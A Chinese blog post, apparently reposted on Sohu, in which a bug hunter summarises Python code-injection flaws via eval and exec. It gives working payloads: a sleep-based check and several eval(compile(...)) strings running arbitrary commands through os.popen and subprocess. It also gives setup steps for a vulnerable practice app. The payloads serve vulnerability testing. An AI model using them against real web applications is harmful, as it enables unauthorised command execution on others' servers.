本文探讨了Python代码注入漏洞,重点介绍了eval和exec函数的安全风险,通过示例代码展示了漏洞利用方式,并提到了检测方法。作者分享了验证payload和一个利用工具,同时提醒在特定场景下可能需要对字符进行URL编码。
原标题:【奇技淫巧】python代码注入
1.限号季,发一下之前的一点笔记写的很浅显希望各位大佬勿喷
.在挖掘某专属厂商的时候出现了一个有意思的地方,python代码执行
2.简单的进行验证一下可以发现sleep进行了执行
3.基本确定存在python代码执行漏洞,但是如何利用呢,翻到一篇安全客的文章https://www.anquanke.com/post/id/84891 是一篇翻译的文章 ,简单的进行解析一下。
文章解析:
python代码注入的原因:
当你在网上搜索关于python的eval函数时,几乎没有文章会提醒你这个函数是非常不安全的,而eval函数就是导致这个Python代码注入漏洞的罪魁祸首。如果你遇到了下面这两种情况,说明你的Web应用中存在这个漏洞:
1. Web应用接受用户输入(例如GET/POST参数,cookie值);
2. Web应用使用了一种不安全的方法来将用户的输入数据传递给eval函数(没有经过安全审查,或者缺少安全保护机制);
3.除了eval函数之外,Python的exec函数也有可能让你的Web应用中出现这个漏洞
这是文章中给的示例代码
总结来说就是使用了eval 和exec函数没有进行过滤
4.然后作者提供了几个验证的payload
1.通过返回时间验证
eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))上面已经给了验证
2.命令执行
eval(compile("""for x in range(1):n import osn os.popen(r'COMMAND').read""",'','single'))
3.eval(compile("""__import__('os').popen(r'COMMAND').read""",'','single'))命令执行
4.__import__('os').popen('COMMAND').read命令执行
5.作者提供了一个python代码执行利用工具https://github.com/sethsec/PyCodeInjection ,自己简单测试了一下,没成功有兴趣的可以研究一下
作者提供的复现环境:
gitclone https://github.com/sethsec/PyCodeInjection.git
cd VulnApp
./install_requirements.sh
python PyCodeInjectionApp.py
6.作者还提到了一个场景当全局函数“__import__”会不起作用的时候可以利用for循环
eval(compile( """for x in range(1):n import osn os.popen(r'COMMAND').read""", '', 'single')) eval(compile( """for x in range(1):n import subprocessn subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE).stdout.read""", '', 'single')) eval(compile( """for x in range(1):n import subprocessn subprocess.check_output(r'COMMAND',shell=True)""", '', 'single'))
另外作者提到了一个点:为了将这个Payload发送给目标Web应用,你需要对其中的某些字符进行URL编码,但是我在进行验证的时候并不需要可能是场景的问题,具体的话还有很多需要探索的。
如何检测:这是作者提供的,我简单的理解就是hhh用burp或者扫描器检测
具体也去搜索了一下发现国内并没有多少python代码注入漏洞的文章,如果有更好的检测方法可以在下面留言返回搜狐,查看更多
责任编辑:
扫一扫
871
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
